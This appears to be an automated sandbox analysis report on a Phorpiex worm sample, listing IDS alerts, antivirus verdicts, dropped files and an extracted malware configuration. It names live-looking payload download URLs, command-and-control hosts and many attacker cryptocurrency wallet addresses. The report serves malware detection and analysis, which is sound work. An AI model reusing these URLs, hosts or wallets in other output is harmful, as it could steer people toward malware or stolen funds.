    2025-03-09T13:57:21.450455+010028032742Potentially Bad Traffic192.168.2.54967445.93.20.1880TCP
    2025-03-09T13:57:25.231064+010028032742Potentially Bad Traffic192.168.2.54967645.93.20.1880TCP
    2025-03-09T13:57:28.996928+010028032742Potentially Bad Traffic192.168.2.54968245.93.20.1880TCP
    2025-03-09T13:57:32.805077+010028032742Potentially Bad Traffic192.168.2.54968445.93.20.1880TCP
    2025-03-09T13:57:36.690150+010028032742Potentially Bad Traffic192.168.2.54968691.202.233.14180TCP
    2025-03-09T13:57:39.441513+010028032742Potentially Bad Traffic192.168.2.54968791.202.233.14180TCP
    2025-03-09T13:57:42.185057+010028032742Potentially Bad Traffic192.168.2.54968991.202.233.14180TCP
    2025-03-09T13:57:44.932867+010028032742Potentially Bad Traffic192.168.2.54969091.202.233.14180TCP
    2025-03-09T13:57:47.691344+010028032742Potentially Bad Traffic192.168.2.54969291.202.233.14180TCP
    2025-03-09T13:57:52.465399+010028032742Potentially Bad Traffic192.168.2.54969345.93.20.1880TCP
    2025-03-09T13:57:56.231300+010028032742Potentially Bad Traffic192.168.2.54969545.93.20.1880TCP
    2025-03-09T13:58:00.078103+010028032742Potentially Bad Traffic192.168.2.54969745.93.20.1880TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-03-09T13:53:55.194414+010028565631A Network Trojan was detected192.168.2.5643351.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-03-09T13:53:58.710704+010028532921Malware Command and Control Activity Detected192.168.2.549709185.215.113.6680TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-03-09T13:54:03.751692+010028482951A Network Trojan was detected192.168.2.54971091.202.233.14180TCP
    2025-03-09T13:54:05.548445+010028482951A Network Trojan was detected192.168.2.54971291.202.233.14180TCP
    2025-03-09T13:54:11.974570+010028482951A Network Trojan was detected192.168.2.54971291.202.233.14180TCP
    2025-03-09T13:54:14.260907+010028482951A Network Trojan was detected192.168.2.54971291.202.233.14180TCP
    2025-03-09T13:54:16.549798+010028482951A Network Trojan was detected192.168.2.54971291.202.233.14180TCP
    2025-03-09T13:54:18.805223+010028482951A Network Trojan was detected192.168.2.54971291.202.233.14180TCP
    2025-03-09T13:54:23.605572+010028482951A Network Trojan was detected192.168.2.54958745.93.20.1880TCP
    2025-03-09T13:54:27.367765+010028482951A Network Trojan was detected192.168.2.54958945.93.20.1880TCP
    2025-03-09T13:54:31.133646+010028482951A Network Trojan was detected192.168.2.54959145.93.20.1880TCP
    2025-03-09T13:54:34.930434+010028482951A Network Trojan was detected192.168.2.54959245.93.20.1880TCP
    2025-03-09T13:54:38.713259+010028482951A Network Trojan was detected192.168.2.54959445.93.20.1880TCP
    2025-03-09T13:54:42.727357+010028482951A Network Trojan was detected192.168.2.54959591.202.233.14180TCP
    2025-03-09T13:54:45.528581+010028482951A Network Trojan was detected192.168.2.54959691.202.233.14180TCP
    2025-03-09T13:54:47.781200+010028482951A Network Trojan was detected192.168.2.54959691.202.233.14180TCP
    2025-03-09T13:54:50.063393+010028482951A Network Trojan was detected192.168.2.54959691.202.233.14180TCP
    2025-03-09T13:54:52.327644+010028482951A Network Trojan was detected192.168.2.54959691.202.233.14180TCP
    2025-03-09T13:54:57.181848+010028482951A Network Trojan was detected192.168.2.54959845.93.20.1880TCP
    2025-03-09T13:55:00.966612+010028482951A Network Trojan was detected192.168.2.54960045.93.20.1880TCP
    2025-03-09T13:55:04.747416+010028482951A Network Trojan was detected192.168.2.54960145.93.20.1880TCP
    2025-03-09T13:55:08.528664+010028482951A Network Trojan was detected192.168.2.54960345.93.20.1880TCP
    2025-03-09T13:55:12.291313+010028482951A Network Trojan was detected192.168.2.54960545.93.20.1880TCP
    2025-03-09T13:55:16.297318+010028482951A Network Trojan was detected192.168.2.54960791.202.233.14180TCP
    2025-03-09T13:55:19.093052+010028482951A Network Trojan was detected192.168.2.54960891.202.233.14180TCP
    2025-03-09T13:55:21.862183+010028482951A Network Trojan was detected192.168.2.54961091.202.233.14180TCP
    2025-03-09T13:55:24.602892+010028482951A Network Trojan was detected192.168.2.54961191.202.233.14180TCP
    2025-03-09T13:55:27.364644+010028482951A Network Trojan was detected192.168.2.54961391.202.233.14180TCP
    2025-03-09T13:55:32.147306+010028482951A Network Trojan was detected192.168.2.54961545.93.20.1880TCP
    2025-03-09T13:55:35.936299+010028482951A Network Trojan was detected192.168.2.54961645.93.20.1880TCP
    2025-03-09T13:55:39.714414+010028482951A Network Trojan was detected192.168.2.54961845.93.20.1880TCP
    2025-03-09T13:55:43.589369+010028482951A Network Trojan was detected192.168.2.54962045.93.20.1880TCP
    2025-03-09T13:55:47.353905+010028482951A Network Trojan was detected192.168.2.54962245.93.20.1880TCP
    2025-03-09T13:55:51.287294+010028482951A Network Trojan was detected192.168.2.54962491.202.233.14180TCP
    2025-03-09T13:55:54.092835+010028482951A Network Trojan was detected192.168.2.54962591.202.233.14180TCP
    2025-03-09T13:55:57.284640+010028482951A Network Trojan was detected192.168.2.54962791.202.233.14180TCP
    2025-03-09T13:56:00.031906+010028482951A Network Trojan was detected192.168.2.54962891.202.233.14180TCP
    2025-03-09T13:56:02.792944+010028482951A Network Trojan was detected192.168.2.54963091.202.233.14180TCP
    2025-03-09T13:56:07.608857+010028482951A Network Trojan was detected192.168.2.54963245.93.20.1880TCP
    2025-03-09T13:56:11.370667+010028482951A Network Trojan was detected192.168.2.54963345.93.20.1880TCP
    2025-03-09T13:56:15.156822+010028482951A Network Trojan was detected192.168.2.54963545.93.20.1880TCP
    2025-03-09T13:56:18.934891+010028482951A Network Trojan was detected192.168.2.54963745.93.20.1880TCP
    2025-03-09T13:56:22.734701+010028482951A Network Trojan was detected192.168.2.54963945.93.20.1880TCP
    2025-03-09T13:56:26.604411+010028482951A Network Trojan was detected192.168.2.54964191.202.233.14180TCP
    2025-03-09T13:56:29.373772+010028482951A Network Trojan was detected192.168.2.54964291.202.233.14180TCP
    2025-03-09T13:56:32.158811+010028482951A Network Trojan was detected192.168.2.54964491.202.233.14180TCP
    2025-03-09T13:56:35.225653+010028482951A Network Trojan was detected192.168.2.54964591.202.233.14180TCP
    2025-03-09T13:56:37.980446+010028482951A Network Trojan was detected192.168.2.54964791.202.233.14180TCP
    2025-03-09T13:56:42.776940+010028482951A Network Trojan was detected192.168.2.54964945.93.20.1880TCP
    2025-03-09T13:56:46.543602+010028482951A Network Trojan was detected192.168.2.54965045.93.20.1880TCP
    2025-03-09T13:56:50.370269+010028482951A Network Trojan was detected192.168.2.54965245.93.20.1880TCP
    2025-03-09T13:56:54.188891+010028482951A Network Trojan was detected192.168.2.54965445.93.20.1880TCP
    2025-03-09T13:56:57.965212+010028482951A Network Trojan was detected192.168.2.54965645.93.20.1880TCP
    2025-03-09T13:57:01.855945+010028482951A Network Trojan was detected192.168.2.54965891.202.233.14180TCP
    2025-03-09T13:57:04.602502+010028482951A Network Trojan was detected192.168.2.54965991.202.233.14180TCP
    2025-03-09T13:57:07.352960+010028482951A Network Trojan was detected192.168.2.54966191.202.233.14180TCP
    2025-03-09T13:57:10.110738+010028482951A Network Trojan was detected192.168.2.54966291.202.233.14180TCP
    2025-03-09T13:57:12.876902+010028482951A Network Trojan was detected192.168.2.54967191.202.233.14180TCP
    2025-03-09T13:57:17.671813+010028482951A Network Trojan was detected192.168.2.54967345.93.20.1880TCP
    2025-03-09T13:57:21.450455+010028482951A Network Trojan was detected192.168.2.54967445.93.20.1880TCP
    2025-03-09T13:57:25.231064+010028482951A Network Trojan was detected192.168.2.54967645.93.20.1880TCP
    2025-03-09T13:57:28.996928+010028482951A Network Trojan was detected192.168.2.54968245.93.20.1880TCP
    2025-03-09T13:57:32.805077+010028482951A Network Trojan was detected192.168.2.54968445.93.20.1880TCP
    2025-03-09T13:57:36.690150+010028482951A Network Trojan was detected192.168.2.54968691.202.233.14180TCP
    2025-03-09T13:57:39.441513+010028482951A Network Trojan was detected192.168.2.54968791.202.233.14180TCP
    2025-03-09T13:57:42.185057+010028482951A Network Trojan was detected192.168.2.54968991.202.233.14180TCP
    2025-03-09T13:57:44.932867+010028482951A Network Trojan was detected192.168.2.54969091.202.233.14180TCP
    2025-03-09T13:57:47.691344+010028482951A Network Trojan was detected192.168.2.54969291.202.233.14180TCP
    2025-03-09T13:57:52.465399+010028482951A Network Trojan was detected192.168.2.54969345.93.20.1880TCP
    2025-03-09T13:57:56.231300+010028482951A Network Trojan was detected192.168.2.54969545.93.20.1880TCP
    2025-03-09T13:58:00.078103+010028482951A Network Trojan was detected192.168.2.54969745.93.20.1880TCP

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Antivirus / Scanner detection for submitted sample
    Source: a0RkmvhSaf.exeAvira: detected
    Antivirus detection for URL or domain
    Source: http://91.202.233.141/1.exei/Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/2.exe0Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/1.exeAvira URL Cloud: Label: malware
    Source: http://91.202.233.141/1Avira URL Cloud: Label: malware
    Source: http://twizt.net/peinstall.phpXrAvira URL Cloud: Label: malware
    Source: http://91.202.233.141/Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/2Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/4.exeswsock.dll.muiAvira URL Cloud: Label: malware
    Source: http://91.202.233.141/11.exeRAvira URL Cloud: Label: malware
    Source: http://91.202.233.141/7.exey/Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/7.exeshqos.dll.muiAvira URL Cloud: Label: malware
    Source: http://91.202.233.141/12.exeqAvira URL Cloud: Label: malware
    Source: http://91.202.233.141/1%Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/5Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/7.exeq/Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/2.233.141/Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/?kAvira URL Cloud: Label: malware
    Source: http://91.202.233.141/4Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/3Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/9.exeAvira URL Cloud: Label: malware
    Source: http://91.202.233.141/4.exeAvira URL Cloud: Label: malware
    Source: http://twizt.net/peinstall.phpqAvira URL Cloud: Label: malware
    Source: http://91.202.233.141/11.exexAvira URL Cloud: Label: malware
    Source: http://twizt.net/peinstall.php6qcJ#Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/http://45.93.20.18/12345%s%s%s:Zone.Identifier%USERPROFILE%%windir%%sAvira URL Cloud: Label: malware
    Source: http://91.202.233.141/2aAvira URL Cloud: Label: malware
    Source: http://91.202.233.141/10.exedbAvira URL Cloud: Label: malware
    Source: http://91.202.233.141/3.exeAvira URL Cloud: Label: malware
    Source: http://91.202.233.141/8.exe1.Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/10.exe8-Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/5.exeI/Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/1.exehttp://91.202.233.141/2.exehttp://91.202.233.141/3.exehttp://91.202.233.1Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/2.exeAvira URL Cloud: Label: malware
    Source: http://91.202.233.141/6.exeAvira URL Cloud: Label: malware
    Source: http://91.202.233.141/7.exeAvira URL Cloud: Label: malware
    Source: http://91.202.233.141/12.exehnAvira URL Cloud: Label: malware
    Source: http://91.202.233.141/12.exe6Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/wsAvira URL Cloud: Label: malware
    Source: http://91.202.233.141/11.exeAvira URL Cloud: Label: malware
    Source: http://91.202.233.141/12.exehqos.dll.muiAvira URL Cloud: Label: malware
    Source: http://91.202.233.141/6.exeTAvira URL Cloud: Label: malware
    Source: http://91.202.233.141/5.exeAvira URL Cloud: Label: malware
    Source: http://91.202.233.141/8.exeAvira URL Cloud: Label: malware
    Source: http://twizt.net/peinstall.phpIrAvira URL Cloud: Label: malware
    Source: http://91.202.233.141/10.exey-Avira URL Cloud: Label: malware
    Source: http://twizt.net/peinstall.phpshqos.dll.muiAvira URL Cloud: Label: malware
    Source: http://91.202.233.141/vAvira URL Cloud: Label: malware
    Source: http://91.202.233.141/1C:Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/5.exe)/Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/6.exeQ/Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/10.exeAvira URL Cloud: Label: malware
    Source: http://91.202.233.141/3.exeA/Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/10.exe_-Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/12.exeLAvira URL Cloud: Label: malware
    Source: http://twizt.net/peinstall.php%temp%%sAvira URL Cloud: Label: malware
    Source: http://91.202.233.141/7.exe233.141/3.exeshqos.dll.muidAvira URL Cloud: Label: malware
    Source: http://91.202.233.141/10.exeg-Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/9.exerAvira URL Cloud: Label: malware
    Source: http://91.202.233.141/12.exeRAvira URL Cloud: Label: malware
    Source: http://twizt.net/peinstall.phpystem32Avira URL Cloud: Label: malware
    Source: http://twizt.net/newtpp.exeP0Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/3.exe9/Avira URL Cloud: Label: malware
    Source: http://twizt.net/newtpp.exeAvira URL Cloud: Label: malware
    Source: http://91.202.233.141/12.exeAvira URL Cloud: Label: malware
    Source: http://twizt.net/peinstall.phpAvira URL Cloud: Label: malware
    Antivirus detection for dropped file
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\12[1].exeAvira: detection malicious, Label: TR/Redcap.tfslp
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeAvira: detection malicious, Label: TR/Agent.xvmwx
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\2[1].exeAvira: detection malicious, Label: TR/Agent.xvmwx
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\1[1].exeAvira: detection malicious, Label: TR/Agent.wveom
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\11[1].exeAvira: detection malicious, Label: TR/Agent.krtrn
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeAvira: detection malicious, Label: WORM/Phorpiex.hrjck
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeAvira: detection malicious, Label: TR/Agent.lvaok
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\6[1].exeAvira: detection malicious, Label: TR/Agent.lvaok
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\10[1].exeAvira: detection malicious, Label: TR/Agent.ihpob
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeAvira: detection malicious, Label: TR/ATRAPS.dhtti
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\8[1].exeAvira: detection malicious, Label: TR/ATRAPS.dhtti
    Source: C:\Users\user\AppData\Local\Temp\203235335.exeAvira: detection malicious, Label: TR/Agent.krtrn
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\newtpp[1].exeAvira: detection malicious, Label: HEUR/AGEN.1360619
    Found malware configuration
    Source: 7.0.sysludpvs.exe.400000.0.unpackMalware Configuration Extractor: Phorpiex {"C2 url": ["http://91.202.233.141/", "http://45.93.20.18/"], "Wallet": ["15TssKwtjMtwy4vDLcLsQUZUD2B9f7eDjw85sBNVC5LRPPnC", "1BzmrjmKPKSR2hH5BeJySfiVA676E8DYaK", "lskaj7asu8rwp4p9kpdqebnqh6kzyuefzqjszyd5w", "lava@100le8y8x7w4uls8dhkuvtzten5jyvxgfj0crhw", "ltc1qt0n3f0t7vz9k0mvcswk477shrxwjhf9sj5ykrp", "osmo125f3mw4xd9htpsq4zj5w5ezm5gags37y6pnhx3", "one1mnk7lk2506r0ewvr7zgwfuyt7ahvngwqedka3x", "3PMiLynrGVZ8oEqvoqC4hXD67B1WoALR4pc", "3ESHude8zUHksQg1h6hHmzY79BS36L91Yn", "EQxXrZv7VQpoAA15kJ1XJyXVxT3yQSoNyM", "EQBeqKxk-pwQ86KK0jwau5NKkjk9c-xtDR8kU5YP3OgROvlE", "Cz6xMbBst86mjM44qAaE5ahkD3F8JpLY7LFGHMiKYzwS6mn", "CSLKveRL2zqkbV2TqiFVuW6twtpqgFajoUZLAJQTTQk2", "DLUzwvyxN1RrwjByUPPzVMdfxNRPGVRMMA", "DsWwjQcpgo8AoFYvFnLrwFpcx8wgjSYLexe", "t1J6GCPCiHW1eRdjJgDDu6b1vSVmL5U7Twh", "terra1mw3dhwak2qe46drv4g7lvgwn79fzm8nr0htdq5", "thor1tdexg3v738xg9n289d6586frflkkcxxdgtauur", "tz1ZUNuZkWjdTt597axUcyZ5kFRtUZmUKuG2", "stars125f3mw4xd9htpsq4zj5w5ezm5gags37yxxh6mj", "stride125f3mw4xd9htpsq4zj5w5ezm5gags37y33qmy0", "sei125f3mw4xd9htpsq4zj5w5ezm5gags37ylk33kz", "sys1q0zg3clqajs04p2yhkgf96nf4hmup9mdr8l38u6", "bnb1msyt0djx4ecspfxg5en0ye465kg3kmv9utzml2", "bc1ppypcmu3684n648gyj62gjp2rw0xy7w3vwfamatlg29ajp4z52desafa0sr", "bc1qc9edl4hzl9jyt8twdad3zjeh2df2znq96tdezd", "btg1qwg85kf0r3885a82wtld053fy490lm2q2gemgpy", "GBQJMXYXPRIWFMXIFJR35ZB7LRKMB4PHCIUAUFR3TKUL6RDBZVLZEUJ3", "Gcrx8cK7ffKLaPJwiYHQrgi6pFTLbJsBPV", "B62qpDfv86fUZc4ntrYJL6eFJZajjNKRcBuW5iPbcLNkiPekLkV8NdA", "BKyTYg4eZC9NCzcL8M3hcUmDhCnBJrSScH", "ronin:a77fa3ea6e09a5f3fbfcb2a42fe21b5cf0ecdd1a", "bitcoincash:qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r", "cosmos125f3mw4xd9htpsq4zj5w5ezm5gags37yj6q8sr", "addr1qxlwyj95fk9exqf55tdknx49e5443nr925tajatrdqpp8djla7u9jhswc3dk39se79f9zhwwq2ca95er3mylm48wyalqr62dmg", "nano_3p8stz4wqicgda1g3ifd48girzd5u74is8sdqq99tkuuz1b96wjwbc7yrmnb"]}
    Multi AV Scanner detection for dropped file
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\10[1].exeReversingLabs: Detection: 75%
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\2[1].exeReversingLabs: Detection: 68%
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\6[1].exeReversingLabs: Detection: 63%
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\1[1].exeReversingLabs: Detection: 95%
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\5[1].exeReversingLabs: Detection: 52%
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\newtpp[1].exeReversingLabs: Detection: 75%
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\11[1].exeReversingLabs: Detection: 71%
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\3[1].exeReversingLabs: Detection: 52%
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\7[1].exeReversingLabs: Detection: 75%
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\12[1].exeReversingLabs: Detection: 34%
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\4[1].exeReversingLabs: Detection: 52%
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\8[1].exeReversingLabs: Detection: 65%
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\9[1].exeReversingLabs: Detection: 70%
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeReversingLabs: Detection: 65%
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeReversingLabs: Detection: 79%
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeReversingLabs: Detection: 63%
    Source: C:\Users\user\AppData\Local\Temp\203235335.exeReversingLabs: Detection: 71%
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeReversingLabs: Detection: 52%
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeReversingLabs: Detection: 68%
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeReversingLabs: Detection: 75%
    Source: C:\Users\user\AppData\Local\Temp\2860723397.exeReversingLabs: Detection: 34%
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeReversingLabs: Detection: 70%
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeReversingLabs: Detection: 75%
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeReversingLabs: Detection: 75%
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeReversingLabs: Detection: 52%
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeReversingLabs: Detection: 52%
    Source: C:\Users\user\AppData\Local\Temp\634722489.exeReversingLabs: Detection: 95%
    Source: C:\Windows\sysludpvs.exeReversingLabs: Detection: 75%
    Multi AV Scanner detection for submitted file
    Source: a0RkmvhSaf.exeVirustotal: Detection: 83%Perma Link
    Source: a0RkmvhSaf.exeReversingLabs: Detection: 78%
    Joe Sandbox ML detected suspicious sample
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeCode function: 1_2_0040BFF0 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,1_2_0040BFF0
    Source: C:\Windows\sysludpvs.exeCode function: 2_2_0040BFF0 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,2_2_0040BFF0
    Source: C:\Windows\sysludpvs.exeCode function: 7_2_0040BFF0 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,7_2_0040BFF0

    Phishing

    barindex
    Yara detected Phorpiex
    Source: Yara matchFile source: Process Memory Space: 230053364.exe PID: 8652, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: sysludpvs.exe PID: 8672, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: sysludpvs.exe PID: 9076, type: MEMORYSTR
    Source: a0RkmvhSaf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9625_none_508ef7e4bcbbe589\MSVCR90.dllJump to behavior
    Source: a0RkmvhSaf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Source: Binary string: mscorlib.pdb source: WERBE6A.tmp.dmp.12.dr
    Source: Binary string: System.ni.pdbRSDS source: WERBE6A.tmp.dmp.12.dr
    Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERBE6A.tmp.dmp.12.dr
    Source: Binary string: System.Management.pdb source: WERBE6A.tmp.dmp.12.dr
    Source: Binary string: mscorlib.ni.pdb source: WERBE6A.tmp.dmp.12.dr
    Source: Binary string: System.Management.ni.pdb source: WERBE6A.tmp.dmp.12.dr
    Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERBE6A.tmp.dmp.12.dr
    Source: Binary string: System.ni.pdb source: WERBE6A.tmp.dmp.12.dr
    Source: Binary string: System.pdb source: WERBE6A.tmp.dmp.12.dr
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeCode function: 1_2_00406690 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00406690
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeCode function: 1_2_004067D0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,1_2_004067D0
    Source: C:\Windows\sysludpvs.exeCode function: 2_2_00406690 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,2_2_00406690
    Source: C:\Windows\sysludpvs.exeCode function: 2_2_004067D0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,2_2_004067D0
    Source: C:\Windows\sysludpvs.exeCode function: 7_2_00406690 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,7_2_00406690
    Source: C:\Windows\sysludpvs.exeCode function: 7_2_004067D0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,7_2_004067D0

    Networking

    barindex
    Suricata IDS alerts for network traffic
    Source: Network trafficSuricata IDS: 2856563 - Severity 1 - ETPRO MALWARE Phorpiex Domain in DNS Lookup : 192.168.2.5:64335 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.5:65203 -> 5.76.154.73:40500
    Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.5:65203 -> 37.150.149.45:40500
    Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.5:65203 -> 92.244.232.104:40500
    Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.5:65203 -> 5.233.112.110:40500
    Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.5:65203 -> 213.206.60.173:40500
    Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.5:65203 -> 213.206.62.251:40500
    Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49589 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.5:65203 -> 151.233.107.54:40500
    Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.5:65203 -> 37.151.27.190:40500
    Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49710 -> 91.202.233.141:80
    Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.5:65203 -> 93.188.86.253:40500
    Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49608 -> 91.202.233.141:80
    Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.5:65203 -> 90.156.165.93:40500
    Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49610 -> 91.202.233.141:80
    Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.5:65203 -> 113.86.140.229:40500
    Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49596 -> 91.202.233.141:80
